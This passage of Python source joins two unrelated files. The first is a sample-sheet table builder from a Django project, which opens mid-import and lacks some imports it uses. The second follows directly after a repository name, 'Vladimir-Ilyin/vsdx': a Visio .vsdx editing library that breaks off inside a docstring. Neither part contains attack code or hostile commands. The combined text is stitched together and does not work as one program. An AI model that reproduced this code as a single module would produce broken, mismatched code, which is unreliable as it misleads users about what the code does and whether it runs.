packaging import version import re import time from altamisa.constants import table_headers as th from altamisa.isatab.write_assay_study import RefTableBuilder from datetime import date from django.conf import settings # Projectroles dependency from projectroles.app_settings import AppSettingAPI from samplesheets.models import Process, GenericMaterial from samplesheets.utils import get_node_obj header_re = re.compile(r'^([a-zA-Z\s]+)[\[](.+)[\]]$') contact_re = re.compile(r'(.+?)\s?(?:[<|[])(.+?)(?:[>\]])') logger = logging.getLogger(__name__) app_settings = AppSettingAPI() TOP_HEADER_MATERIAL_COLOURS = { 'SOURCE': 'info', 'SAMPLE': 'warning', 'MATERIAL': 'success', 'DATA': 'success', } TOP_HEADER_MATERIAL_VALUES = { 'SOURCE': 'Source', 'SAMPLE': 'Sample', 'MATERIAL': 'Material', 'DATA': 'Data File', } EMPTY_VALUE = '-' STUDY_HIDEABLE_CLASS = 'sodar-ss-hideable-study' SOURCE_SEARCH_STR = '-source-' NARROW_CHARS = 'fIijlt;:.,/"!\'!()[]{}' WIDE_CHARS = 'ABCDEFHKLMNOPQRSTUVXYZ<>%$_' IGNORED_HEADERS = ['Unit', 'Term Source REF', 'Term Accession Number'] # Name fields (NOTE: Missing labeled extract name by purpose) ALTAMISA_MATERIAL_NAMES = [ th.EXTRACT_NAME, th.LIBRARY_NAME, th.SAMPLE_NAME, th.SOURCE_NAME, ] # Attribute list lookup LIST_ATTR_MAP = { th.CHARACTERISTICS: 'characteristics', th.COMMENT: 'comments', th.FACTOR_VALUE: 'factor_values', 
th.PARAMETER_VALUE: 'parameter_values', } # Basic fields lookup (header -> member of node) BASIC_FIELD_MAP = {th.PERFORMER: 'performer', th.DATE: 'perform_date'} # altamISA -> SODAR header name lookup HEADER_MAP = { th.LABELED_EXTRACT_NAME: 'Label', th.PROTOCOL_REF: 'Protocol', th.PERFORMER: 'Performer', th.DATE: 'Perform Date', } # Map JSON attributes to model attributes MODEL_JSON_ATTRS = [ 'characteristics', 'comments', 'factor_values', 'parameter_values', ] # HACK: Special cases for inline file linking (see issue #817) SPECIAL_FILE_LINK_HEADERS = ['report file'] # Table building --------------------------------------------------------------- class SampleSheetRenderingException(Exception): """Sample sheet rendering exception""" class SampleSheetTableBuilder: """ Class for building a sample sheet table as dict. Contains table cells, their properties and headers, to be rendered as HTML on the site or used in backend operations. """ def __init__(self): self._study = None self._assay = None self._row = [] self._top_header = [] self._field_header = [] self._field_configs = [] self._table_data = [] self._first_row = True self._col_values = [] self._col_idx = 0 self._node_idx = 0 self._field_idx = 0 self._parser_version = None self._edit = False self._sheet_config = None # General Data and Cell Functions ------------------------------------------ @classmethod def _get_value(cls, field): """ Return value of a field which can be either free text or term reference. :param field: Field (string or dict) :return: String """ if isinstance(field, str): return field if isinstance(field, dict) and 'value' in field: if isinstance(field['value'], dict) and 'name' in field['value']: return field['value']['name'] return field['value'] return '' @classmethod def _get_ontology_url(cls, ontology_name, accession): """ Return full URL for ontology reference. :param ontology_name: String :param accession: String (contains an URL) :return: String """ if ( not settings.SHEETS_ONTOLOGY_URL_TEMPLATE or not accession or any(s in accession for s in settings.SHEETS_ONTOLOGY_URL_SKIP) ): return accession # HACK: "HP" is commonly incorrectly provided as "HPO" if ontology_name == 'HPO': ontology_name = 'HP' return settings.SHEETS_ONTOLOGY_URL_TEMPLATE.format( ontology_name=ontology_name, accession=accession ) @classmethod def _get_ontology_link(cls, ontology_name, accession): """ Build ontology link(s). :param ontology_name: Ontology name :param accession: Ontology accession URL :return: String """ return ';'.join( [ cls._get_ontology_url(ontology_name, a) for a in accession.split(';') ] ) def _add_top_header(self, obj, colspan): """ Append columns to top header. :param obj: GenericMaterial or Process object :param colspan: Column count for the node """ if isinstance(obj, GenericMaterial): # Material colour = TOP_HEADER_MATERIAL_COLOURS[obj.item_type] value = ( obj.material_type if obj.material_type and obj.item_type not in ['SOURCE', 'SAMPLE'] else TOP_HEADER_MATERIAL_VALUES[obj.item_type] ) else: # Process colour = 'danger' value = 'Process' th = {'value': value.strip(), 'colour': colour, 'colspan': colspan} if self._edit: th['headers'] = obj.headers # Store the full header for editing self._top_header.append(th) self._node_idx += 1 self._field_idx = 0 def _add_header(self, name, header_type=None, obj=None): """ Add column field header value. 
:param name: Header name to be displayed as "value" :param header_type: Header type :param obj: Original Django model object """ header = { 'value': name.strip().title(), # TODO: Better titling (#576) 'name': name, # Store original field name 'obj_cls': obj.__class__.__name__, 'item_type': obj.item_type if isinstance(obj, GenericMaterial) else None, 'num_col': False, # Will be checked for sorting later 'config_set': False, } field_config = None # Get existing field config if self._sheet_config: study_config = self._sheet_config['studies'][ str(self._study.sodar_uuid) ] if not self._assay or self._node_idx < len(study_config['nodes']): field_config = study_config['nodes'][self._node_idx]['fields'][ self._field_idx ] else: # Assay a_node_idx = self._node_idx - len(study_config['nodes']) field_config = study_config['assays'][ str(self._assay.sodar_uuid) ]['nodes'][a_node_idx]['fields'][self._field_idx] # Save info on whether a pre-existing config is set for this field if field_config and field_config.get('format'): self._field_configs.append(True) else: self._field_configs.append(False) # Column type (the ones we can determine at this point) if ( field_config and field_config.get('format') in ['double', 'integer'] and not obj.has_unit(name, header_type) ): header['col_type'] = 'NUMERIC' # Else detect type without config elif ( name.lower() == 'name' or name in th.PROCESS_NAME_HEADERS ) and header['item_type'] != 'DATA': header['col_type'] = 'NAME' elif name.lower() == 'protocol': header['col_type'] = 'PROTOCOL' elif 'contact' in name.lower() or name == 'Performer': header['col_type'] = 'CONTACT' elif name == 'Perform Date': header['col_type'] = 'DATE' elif name.lower() == 'external links': header['col_type'] = 'EXTERNAL_LINKS' elif ( name.lower() == 'name' and header['item_type'] == 'DATA' ) or name.lower() in SPECIAL_FILE_LINK_HEADERS: # HACK for issue #817 header['col_type'] = 'LINK_FILE' # Recognize ONTOLOGY by headers elif obj.is_ontology_field(name, header_type): header['col_type'] = 'ONTOLOGY' # Recognize UNIT by headers elif obj.has_unit(name, header_type): header['col_type'] = 'UNIT' else: header['col_type'] = None # Default / to be determined later # Add extra data for editing if self._edit: header['type'] = header_type self._field_header.append(header) self._field_idx += 1 def _add_cell( self, value, header_name, unit=None, link=None, header_type=None, obj=None, tooltip=None, ): """ Add cell data. Also maintain column value list and insert header if on the first row and required parameters are supplied. 
:param value: Value to be displayed in the cell :param header_name: Name of the column header :param unit: Unit to be displayed in the cell :param link: Link from the value (URL string) :param header_type: Header type (string) :param obj: Original Django model object :param tooltip: Tooltip to be shown on mouse hover (string) """ # Add header if first row if header_name and obj and self._first_row: self._add_header(header_name, header_type=header_type, obj=obj) # Get printable value in case the function is called with a reference if isinstance(value, dict): value = self._get_value(value) cell = {'value': value.strip() if isinstance(value, str) else value} if unit: cell['unit'] = unit.strip() if isinstance(unit, str) else unit if link: cell['link'] = link if tooltip: cell['tooltip'] = tooltip # Add extra data for editing if self._edit: cell['uuid'] = str(obj.sodar_uuid) # Node UUID # Object reference UUID for special cases if header_type == 'protocol': cell['uuid_ref'] = str(obj.protocol.sodar_uuid) self._row.append(cell) # Store value for detecting unfilled columns col_value = 0 if not value else 1 if self._first_row: self._col_values.append(col_value) elif col_value == 1 and self._col_values[self._col_idx] == 0: self._col_values[self._col_idx] = 1 self._col_idx += 1 def _add_ordered_element(self, obj): """ Append GenericMaterial or Process element to row along with its attributes. To be used with altamISA v0.1+, requires the "headers" field in each object. :param obj: GenericMaterial or Pocess object """ old_header_len = len(self._field_header) headers = [h for h in obj.headers if h not in IGNORED_HEADERS] for h in headers: list_ref = re.findall(header_re, h) # Value lists with possible ontology annotation if list_ref: h_type = list_ref[0][0] h_name = list_ref[0][1] if h_type in LIST_ATTR_MAP and hasattr( obj, LIST_ATTR_MAP[h_type] ): obj_attr = getattr(obj, LIST_ATTR_MAP[h_type]) if h_name in obj_attr: self._add_annotation( obj_attr[h_name], h_name, header_type=LIST_ATTR_MAP[h_type], obj=obj, ) # Basic fields we can simply map using BASIC_FIELD_MAP elif h in BASIC_FIELD_MAP and hasattr(obj, BASIC_FIELD_MAP[h]): self._add_cell( getattr(obj, BASIC_FIELD_MAP[h]), HEADER_MAP[h], header_type=BASIC_FIELD_MAP[h], obj=obj, ) # Special case: Name elif h in ALTAMISA_MATERIAL_NAMES or h in th.DATA_FILE_HEADERS: self._add_cell(obj.name, 'Name', header_type='name', obj=obj) # Special case: Labeled Extract Name & Label elif h == th.LABELED_EXTRACT_NAME and hasattr(obj, 'extract_label'): self._add_cell(obj.name, 'Name', header_type='name', obj=obj) self._add_annotation( {'value': obj.extract_label}, HEADER_MAP[th.LABELED_EXTRACT_NAME], header_type='extract_label', obj=obj, ) # Special case: Array Design REF (NOTE: not actually a reference!) 
elif h == th.ARRAY_DESIGN_REF and hasattr(obj, 'array_design_ref'): self._add_cell( obj.array_design_ref, 'Array Design REF', obj=obj ) # Special case: Protocol Name elif ( h == th.PROTOCOL_REF and hasattr(obj, 'protocol') and obj.protocol ): self._add_cell( obj.protocol.name, HEADER_MAP[th.PROTOCOL_REF], header_type='protocol', obj=obj, ) # Special case: Process Name elif isinstance(obj, Process) and h in th.PROCESS_NAME_HEADERS: self._add_cell(obj.name, h, header_type='process_name', obj=obj) # Special case: First Dimension elif isinstance(obj, Process) and h == th.FIRST_DIMENSION: self._add_annotation( {'value': obj.first_dimension}, 'First Dimension', header_type='first_dimension', obj=obj, ) # Special case: First Dimension elif isinstance(obj, Process) and h == th.SECOND_DIMENSION: self._add_annotation( {'value': obj.second_dimension}, 'Second Dimension', header_type='second_dimension', obj=obj, ) # Add top header if self._first_row: self._add_top_header(obj, len(self._field_header) - old_header_len) def _add_annotation(self, ann, header, header_type, obj): """ Append an ontology annotation or list of values to a row as a single cell. :param ann: Annotation value (string or Dict) :param header: Name of the column header (string) :param header_type: Header type (string or None) :param obj: GenericMaterial or Pocess object the annotation belongs to """ unit = None # Special case: Comments as parsed in SODAR v0.5.2 (see #629) # TODO: TBD: Should these be added in this function at all? if isinstance(ann, str): val = ann # Ontology reference(s) (altamISA v0.1+, SODAR v0.5.2+) elif isinstance(ann['value'], dict) or ( isinstance(ann['value'], list) and len(ann['value']) > 0 and isinstance(ann['value'][0], dict) ): val = [] tmp_val = ann['value'] # Make single reference into a list for simpler rendering if isinstance(ann['value'], dict): tmp_val = [ann['value']] if not tmp_val[0].get('name'): val = '' else: for v in tmp_val: v = dict(v) if isinstance(v['name'], str): v['name'] = v['name'].strip() # Cleanup name elif v['name'] is None: v['name'] = '' if not self._edit: # If not editing, provide user friendly ontology URL v['accession'] = self._get_ontology_url( v['ontology_name'], v['accession'] ) val.append(v) # Basic value string OR a list of strings else: val = ann['value'] # Add unit if present (only for non-list values) # TODO: provide full ontology value for editing once supporting if isinstance(ann, dict) and 'unit' in ann: if isinstance(ann['unit'], dict): unit = ann['unit']['name'] else: unit = ann['unit'] self._add_cell( val, header, unit=unit, link=None, # Link will be retrieved from each ontology term header_type=header_type, obj=obj, tooltip=None, # Tooltip will be retrieved from each ontology term ) # Table building functions ------------------------------------------------- def _append_row(self): """Append current row to table data and cleanup""" self._table_data.append(self._row) self._row = [] self._first_row = False self._col_idx = 0 self._node_idx = 0 self._field_idx = 0 def _add_ui_table_data(self): """Add UI specific data to a table""" # TODO: Un-hackify def _get_length(value, col_type=None): """Return estimated length for proportional text""" if not value: return 0 # Convert perform date if isinstance(value, date): value = str(value) # Lists (altamISA v0.1+) elif isinstance(value, list) and col_type != 'EXTERNAL_LINKS': if isinstance(value[0], dict): value = '; '.join([x['name'] for x in value]) elif isinstance(value[0], list) and value[0]: value = '; '.join([x[0] for x 
in value]) elif isinstance(value[0], str): value = '; '.join(value) # Very unscientific and font-specific, don't try this at home nc = sum([value.count(c) for c in NARROW_CHARS]) wc = sum([value.count(c) for c in WIDE_CHARS]) return round(len(value) - nc - wc + 0.6 * nc + 1.3 * wc) def _is_num(value): """Return whether a value contains an integer/double""" if isinstance(value, str) and '_' in value: return False # HACK because float() accepts underscore try: float(value) return True except (ValueError, TypeError): return False top_idx = 0 # Top header index grp_idx = 0 # Index within current top header group for i in range(len(self._field_header)): header_name = self._field_header[i]['value'] # Set column type to NUMERIC if values are all numeric or empty # (except if name or process name) # Skip check if column is already defined as UNIT if ( header_name != 'Name' and header_name not in th.PROCESS_NAME_HEADERS and not self._field_configs[i] and self._field_header[i]['col_type'] not in ['NUMERIC', 'UNIT'] and any(_is_num(x[i]['value']) for x in self._table_data) and all( (_is_num(x[i]['value']) or not x[i]['value']) for x in self._table_data ) ): self._field_header[i]['col_type'] = 'NUMERIC' # Maximum column value length for column width estimate field_header_len = round( _get_length(self._field_header[i]['value']) ) # If there is only one column in top header, use top header length if self._top_header[top_idx]['colspan'] == 1: top_header_len = round( _get_length(self._top_header[top_idx]['value']) ) header_len = max(field_header_len, top_header_len) else: header_len = field_header_len col_type = self._field_header[i]['col_type'] if col_type == 'CONTACT': max_cell_len = max( [ ( _get_length( re.findall(contact_re, x[i]['value'])[0][0] ) if re.findall(contact_re, x[i].get('value')) else len(x[i].get('value') or '') ) for x in self._table_data ] ) elif col_type == 'EXTERNAL_LINKS': # Special case, count elements header_len = 0 # Header length is not comparable max_cell_len = max( [ _get_length(x[i]['value'], col_type) if (x[i]['value'] and isinstance(x[i]['value'], list)) else 0 for x in self._table_data ] ) else: # Generic type max_cell_len = max( [ _get_length(x[i]['value'], col_type) + _get_length(x[i].get('unit'), col_type) + 1 for x in self._table_data ] ) self._field_header[i]['max_value_len'] = max( [header_len, max_cell_len] ) if grp_idx == self._top_header[top_idx]['colspan'] - 1: top_idx += 1 grp_idx = 0 else: grp_idx += 1 def _build_table( self, table_refs, node_map=None, study=None, assay=None, ui=True ): """ Build a table from the node graph reference. 
:param table_refs: Object unique_name:s in a list of lists :param node_map: Lookup dictionary containing objects (optional) :param study: Study object (optional, required if rendering study) :param assay: Assay object (optional, required if rendering assay) :param ui: Add UI specific data if True (boolean) :raise: ValueError if both study and assay are None :return: Dict """ if not study and not assay: raise ValueError('Either study or assay must be defined') self._study = study or assay.study self._assay = assay self._row = [] self._top_header = [] self._field_header = [] self._field_configs = [] self._table_data = [] self._first_row = True self._col_values = [] self._col_idx = 0 row_id = 0 if not node_map: node_map = self.get_node_map(self._study.get_nodes()) for input_row in table_refs: col_pos = 0 # Add elements in row for col in input_row: self._add_ordered_element(node_map[col]) col_pos += 1 self._append_row() row_id += 1 # Aggregate UI specific data if ui: self._add_ui_table_data() ret = { 'top_header': self._top_header, 'field_header': self._field_header, 'table_data': self._table_data, 'col_values': self._col_values, } # Store index of last visible column for UI if ui: ret['col_last_vis'] = ( len(self._col_values) - self._col_values[::-1].index(1) - 1 ) return ret @classmethod def build_study_reference(cls, study, nodes=None): """ Get study reference table for building final table data. :param study: Study object :param nodes: Study nodes (optional) :return: Nodes (list), table (list) """ if not nodes: nodes = study.get_nodes() arcs = study.arcs for a in study.assays.all().order_by('file_name'): arcs += a.arcs def _is_of_starting_type(starting_type, v): """Predicate to select vertices based on starting type.""" return getattr(v, 'item_type', None) == starting_type # starting_type = 'Source Name' tb = RefTableBuilder( nodes, arcs, functools.partial(_is_of_starting_type, 'SOURCE') ) all_refs = tb.run() if not all_refs: error_msg = ( 'RefTableBuilder failed to build a table from graph, unable to ' 'render study. Please ensure the validity of your ISA-Tab files' ) logger.error(error_msg) raise SampleSheetRenderingException(error_msg) return all_refs @classmethod def get_sample_idx(cls, all_refs): """ Get sample index for a reference table. :param all_refs: All references for a study (list). :return: Integer """ return [i for i, col in enumerate(all_refs[0]) if '-sample-' in col][0] @classmethod def get_node_map(cls, nodes): """ Get dict mapped by unique name for a QuerySet or list of node objects. :param nodes: QuerySet or list :return: Dict """ return {n.unique_name: n for n in nodes} @classmethod def get_study_refs(cls, all_refs, sample_idx=None): """ Get study table references without duplicates. :param all_refs: All references for a study. :param sample_idx: Integer for sample column index (optional) :return: List """ if not sample_idx: sample_idx = cls.get_sample_idx(all_refs) sr = [row[: sample_idx + 1] for row in all_refs] return list(sr for sr, _ in itertools.groupby(sr)) @classmethod def get_assay_refs(cls, all_refs, assay_id, sample_idx, study_cols=True): """ Return assay table references based on assay ID. 
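Rows are matched by the '-a{assay_id}-' substring in the column right after the sample column; when study_cols is False, the returned rows start from the sample column instead of column zero.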
:param all_refs: :param assay_id: Integer for assay ID :param sample_idx: Integer for sample column index :param study_cols: Include study columns if True (bool) :return: List """ assay_search_str = '-a{}-'.format(assay_id) assay_refs = [] start_idx = 0 if study_cols else sample_idx for row in all_refs: if ( len(row) > sample_idx + 1 and assay_search_str in row[sample_idx + 1] ): assay_refs.append(row[start_idx:]) return assay_refs def build_study_tables(self, study, edit=False, use_config=True, ui=True): """ Build study table and associated assay tables for rendering. :param study: Study object :param edit: Return extra data for editing if true (bool) :param use_config: Use sheet configuration in building (bool) :return: Dict """ s_start = time.time() logger.debug( 'Building study "{}" (pk={}, edit={})..'.format( study.get_name(), study.pk, edit ) ) # Get study config for column type detection if use_config: self._sheet_config = app_settings.get_app_setting( 'samplesheets', 'sheet_config', project=study.get_project() ) # HACK: In case of deletion from database bypassing the database, # HACK: make sure the correct UUIDs are in the config if ( self._sheet_config and str(study.sodar_uuid) not in self._sheet_config['studies'] ): logger.warning( 'Unable to use sheet configuration, study UUID not found' ) self._sheet_config = None elif self._sheet_config: logger.debug('Using sheet configuration from app settings') elif not use_config: logger.debug('Not using sheet configuration (use_config=False)') else: logger.debug('No sheet configuration found in app settings') self._edit = edit self._parser_version = ( version.parse(study.investigation.parser_version) if study.investigation.parser_version else version.parse('') ) logger.debug( 'altamISA version at import: {}'.format( self._parser_version if not isinstance(self._parser_version, version.LegacyVersion) else 'LEGACY' ) ) ret = {'study': None, 'assays': {}} nodes = study.get_nodes() all_refs = self.build_study_reference(study, nodes) sample_idx = self.get_sample_idx(all_refs) node_map = self.get_node_map(nodes) # Study ref table without duplicates study_refs = self.get_study_refs(all_refs, sample_idx) ret['study'] = self._build_table( study_refs, node_map, study=study, ui=ui ) logger.debug( 'Building study OK ({:.1f}s)'.format(time.time() - s_start) ) # Assay tables assay_id = 0 for assay in study.assays.all().order_by('pk'): a_start = time.time() logger.debug( 'Building assay "{}" (pk={}, edit={})..'.format( assay.get_name(), assay.pk, edit ) ) assay_refs = self.get_assay_refs(all_refs, assay_id, sample_idx) ret['assays'][str(assay.sodar_uuid)] = self._build_table( assay_refs, node_map, assay=assay, ui=ui ) assay_id += 1 logger.debug( 'Building assay OK ({:.1f}s)'.format(time.time() - a_start) ) return ret def get_headers(self, investigation): """ Return lists of headers for the studies and assays in an investigation. 
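The result maps each study to its own header list plus one header list per assay, e.g. {'studies': [{'headers': [...], 'assays': [[...], ...]}, ...]}.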
:param investigation: Investigation object :return: Dict """ ret = {'studies': []} for study in investigation.studies.all().order_by('pk'): study_data = {'headers': [], 'assays': []} all_refs = self.build_study_reference(study, study.get_nodes()) sample_idx = self.get_sample_idx(all_refs) study_refs = self.get_study_refs(all_refs, sample_idx) assay_id = 0 for n in study_refs[0]: study_data['headers'] += get_node_obj( study=study, unique_name=n ).headers for assay in study.assays.all().order_by('pk'): assay_refs = self.get_assay_refs(all_refs, assay_id, sample_idx) assay_headers = [] for i in range(sample_idx + 1, len(assay_refs[0])): assay_headers += get_node_obj( assay=assay, unique_name=assay_refs[0][i] ).headers study_data['assays'].append(assay_headers) assay_id += 1 ret['studies'].append(study_data) return ret Vladimir-Ilyin/vsdx from __future__ import annotations import zipfile import shutil import os import re from enum import IntEnum from jinja2 import Template from typing import Optional, List import xml.etree.ElementTree as ET from xml.etree.ElementTree import Element import xml.dom.minidom as minidom # minidom used for prettyprint namespace = "{http://schemas.microsoft.com/office/visio/2012/main}" # visio file name space ext_prop_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/extended-properties}' vt_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes}' # utility functions def to_float(val: str): try: if val is None: return return float(val) except ValueError: return 0.0 class PagePosition(IntEnum): FIRST = 0 LAST = -1 END = -1 AFTER = -2 BEFORE= -3 class VisioFile: """Represents a vsdx file :param filename: filename the :class:`VisioFile` was created from :type filename: str :param pages: a list of pages in the VisioFile :type pages: list of :class:`Page` :param master_pages: a list of master pages in the VisioFile :type master_pages: list of :class:`Page` Contains :class:`Page`, :class:`Shape`, :class:`Connect` and :class:`Cell` sub-classes """ def __init__(self, filename, debug: bool = False): """VisioFile constructor :param filename: the vsdx file to load and create the VisioFile object from :type filename: str :param debug: enable/disable debugging :type debug: bool, default to False """ self.debug = debug self.filename = filename if debug: print(f"VisioFile(filename={filename})") self.directory = f"./{filename.rsplit('.', 1)[0]}" self.pages_xml = None self.pages_xml_rels = None self.content_types_xml = None self.app_xml = None self.pages = list() # type: List[VisioFile.Page] # list of Page objects, populated by open_vsdx_file() self.master_pages = list() # type: List[VisioFile.Page] # list of Page objects, populated by open_vsdx_file() self.open_vsdx_file() def __enter__(self): return self def __exit__(self, exc_type, exc_val, exc_tb): self.close_vsdx() @staticmethod def pretty_print_element(xml: Element) -> str: if type(xml) is Element: return minidom.parseString(ET.tostring(xml)).toprettyxml() else: return f"Not an Element. 
type={type(xml)}" def open_vsdx_file(self): with zipfile.ZipFile(self.filename, "r") as zip_ref: zip_ref.extractall(self.directory) # load each page file into an ElementTree object self.load_pages() self.load_master_pages() def _pages_filename(self): page_dir = f'{self.directory}/visio/pages/' pages_filename = page_dir + 'pages.xml' # pages.xml contains Page name, width, height, mapped to Id return pages_filename def load_pages(self): rel_dir = f'{self.directory}/visio/pages/_rels/' page_dir = f'{self.directory}/visio/pages/' rel_filename = rel_dir + 'pages.xml.rels' rels = file_to_xml(rel_filename).getroot() # rels contains page filenames self.pages_xml_rels = file_to_xml(rel_filename) # store pages.xml.rels so pages can be added or removed if self.debug: print(f"Relationships({rel_filename})", VisioFile.pretty_print_element(rels)) relid_page_dict = {} for rel in rels: rel_id = rel.attrib['Id'] page_file = rel.attrib['Target'] relid_page_dict[rel_id] = page_file pages_filename = self._pages_filename() # pages contains Page name, width, height, mapped to Id pages = file_to_xml(pages_filename).getroot() # this contains a list of pages with rel_id and filename self.pages_xml = file_to_xml(pages_filename) # store xml so pages can be removed if self.debug: print(f"Pages({pages_filename})", VisioFile.pretty_print_element(pages)) for page in pages: # type: Element rel_id = page[1].attrib['{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id'] page_name = page.attrib['Name'] page_path = page_dir + relid_page_dict.get(rel_id, None) new_page = VisioFile.Page(file_to_xml(page_path), page_path, page_name, self) self.pages.append(new_page) if self.debug: print(f"Page({new_page.filename})", VisioFile.pretty_print_element(new_page.xml.getroot())) self.content_types_xml = file_to_xml(f'{self.directory}/[Content_Types].xml') # TODO: add correctness cross-check. Or maybe the other way round, start from [Content_Types].xml # to get page_dir and other paths... self.app_xml = file_to_xml(f'{self.directory}/docProps/app.xml') def load_master_pages(self): # get data from /visio/masters folder master_rel_path = f'{self.directory}/visio/masters/_rels/masters.xml.rels' master_rels_data = file_to_xml(master_rel_path) master_rels = master_rels_data.getroot() if master_rels_data else [] if self.debug: print(f"Master Relationships({master_rel_path})", VisioFile.pretty_print_element(master_rels)) # populate relid to master path relid_to_path = {} for rel in master_rels: master_id = rel.attrib.get('Id') master_path = f"{self.directory}/visio/masters/{rel.attrib.get('Target')}" # get path from rel relid_to_path[master_id] = master_path # load masters.xml file masters_path = f'{self.directory}/visio/masters/masters.xml' masters_data = file_to_xml(masters_path) # contains more info about master page (i.e. 
Name, Icon) masters = masters_data.getroot() if masters_data else [] # for each master page, create the VisioFile.Page object r_namespace = '{http://schemas.openxmlformats.org/officeDocument/2006/relationships}' for master in masters: rel_id = master.find(f"{namespace}Rel").attrib[f"{r_namespace}id"] master_id = master.attrib['ID'] master_path = relid_to_path[rel_id] master_page = VisioFile.Page(file_to_xml(master_path), master_path, master_id, self) self.master_pages.append(master_page) if self.debug: print(f"Master({master_path}, id={master_id})", VisioFile.pretty_print_element(master_page.xml.getroot())) return def get_page(self, n: int) -> VisioFile.Page: try: return self.pages[n] except IndexError: return None def get_page_names(self): return [p.name for p in self.pages] def get_page_by_name(self, name: str): """Get page from VisioFile with matching name :param name: The name of the required page :type name: str :return: :class:`Page` object representing the page (or None if not found) """ for p in self.pages: if p.name == name: return p def get_master_page_by_id(self, id: str): """Get master page from VisioFile with matching ID. Referred by :attr:`Shape.master_ID`. :param id: The ID of the required master :type id: str :return: :class:`Page` object representing the master page (or None if not found) """ for m in self.master_pages: if m.name == id: return m def remove_page_by_index(self, index: int): """Remove zero-based nth page from VisioFile object :param index: Zero-based index of the page :type index: int :return: None """ # remove Page element from pages.xml file - zero based index # todo: similar function by page id, and by page title page = self.pages_xml.find(f"{namespace}Page[{index+1}]") if page: self.pages_xml.getroot().remove(page) page = self.pages[index] # type: VisioFile.Page self._remove_page_from_app_xml(page.name) del self.pages[index] def _update_pages_xml_rels(self, new_page_filename: str) -> str: '''Updates the pages.xml.rels file with a reference to the new page and returns the new relid ''' max_relid = max(self.pages_xml_rels.getroot(), key=lambda rel: int(rel.attrib['Id'][3:]), default=None) # 'rIdXX' -> XX max_relid = int(max_relid.attrib['Id'][3:]) if max_relid is not None else 0 new_page_relid = f'rId{max_relid + 1}' # Most likely will be equal to len(self.pages)+1 new_page_rel = { 'Target': new_page_filename, 'Type' : 'http://schemas.microsoft.com/visio/2010/relationships/page', 'Id' : new_page_relid } self.pages_xml_rels.getroot().append(Element('{http://schemas.openxmlformats.org/package/2006/relationships}Relationship', new_page_rel)) return new_page_relid def _get_new_page_name(self, new_page_name: str) -> str: i = 1 while new_page_name in self.get_page_names(): new_page_name = f'{new_page_name}-{i}' # Page-X-i i += 1 return new_page_name def _get_max_page_id(self) -> int: page_with_max_id = max(self.pages_xml.getroot(), key=lambda page: int(page.attrib['ID'])) max_page_id = int(page_with_max_id.attrib['ID']) return max_page_id def _get_index(self, *, index: int, page: VisioFile.Page or None): if type(index) is PagePosition: # only update index if it is relative to source page if index == PagePosition.LAST: index = len(self.pages) elif index == PagePosition.FIRST: index = 0 elif page: # need page for BEFORE or AFTER orig_page_idx = self.pages.index(page) if index == PagePosition.BEFORE: # insert new page at the original page's index index = orig_page_idx elif index == PagePosition.AFTER: # insert new page after the original page index = orig_page_idx + 
1 else: index = len(self.pages) # default to LAST if invalid Position/page combination return index def _update_content_types_xml(self, new_page_filename: str): content_types = self.content_types_xml.getroot() content_types_attribs = { 'PartName' : f'/visio/pages/{new_page_filename}', 'ContentType': 'application/vnd.ms-visio.page+xml' } cont_types_namespace = '{http://schemas.openxmlformats.org/package/2006/content-types}' content_types_element = Element(f'{cont_types_namespace}Override', content_types_attribs) # add the new element after the last such element # first find the index: all_page_overrides = content_types.findall( f'{cont_types_namespace}Override[@ContentType="application/vnd.ms-visio.page+xml"]' ) idx = list(content_types).index(all_page_overrides[-1]) # then add it: content_types.insert(idx+1, content_types_element) def _add_page_to_app_xml(self, new_page_name: str): HeadingPairs = self.app_xml.getroot().find(f'{ext_prop_namespace}HeadingPairs') i4 = HeadingPairs.find(f'.//{vt_namespace}i4') num_pages = int(i4.text) i4.text = str(num_pages+1) # increment as page added TitlesOfParts = self.app_xml.getroot().find(f'{ext_prop_namespace}TitlesOfParts') vector = TitlesOfParts.find(f'{vt_namespace}vector') lpstr = Element(f'{vt_namespace}lpstr') lpstr.text = new_page_name vector.append(lpstr) # add new lpstr element with new page name vector_size = int(vector.attrib['size']) vector.set('size', str(vector_size+1)) # increment as page added def _remove_page_from_app_xml(self, page_name: str): HeadingPairs = self.app_xml.getroot().find(f'{ext_prop_namespace}HeadingPairs') i4 = HeadingPairs.find(f'.//{vt_namespace}i4') num_pages = int(i4.text) i4.text = str(num_pages-1) # decrement as page removed TitlesOfParts = self.app_xml.getroot().find(f'{ext_prop_namespace}TitlesOfParts') vector = TitlesOfParts.find(f'{vt_namespace}vector') for lpstr in vector.findall(f'{vt_namespace}lpstr'): if lpstr.text == page_name: vector.remove(lpstr) # remove page from list of names break vector_size = int(vector.attrib['size']) vector.set('size', str(vector_size-1)) # decrement as page removed def _create_page( self, *, new_page_xml_str: str, page_name: str, new_page_element: Element, index: int or PagePosition, source_page: Optional[VisioFile.Page] = None, ) -> VisioFile.Page: # Create visio\pages\pageX.xml file # Add to visio\pages\_rels\pages.xml.rels # Add to visio\pages\pages.xml # Add to [Content_Types].xml # Add to docProps\app.xml page_dir = f'{self.directory}/visio/pages/' # TODO: better concatenation # create pageX.xml new_page_xml = ET.ElementTree(ET.fromstring(new_page_xml_str)) new_page_filename = f'page{len(self.pages) + 1}.xml' new_page_path = page_dir+new_page_filename # TODO: better concatenation # update pages.xml.rels - add rel for the new page # done by the caller # update pages.xml - insert the PageElement Element in it's correct location index = self._get_index(index=index, page=source_page) self.pages_xml.getroot().insert(index, new_page_element) # update [Content_Types].xml - insert reference to the new page self._update_content_types_xml(new_page_filename) # update app.xml, if it exists if self.app_xml: self._add_page_to_app_xml(page_name) # Update VisioFile object new_page = VisioFile.Page(new_page_xml, new_page_path, page_name, self) self.pages.insert(index, new_page) # insert new page at defined index return new_page def add_page_at(self, index: int, name: Optional[str] = None) -> VisioFile.Page: """Add a new page at the specified index of the VisioFile :param index: 
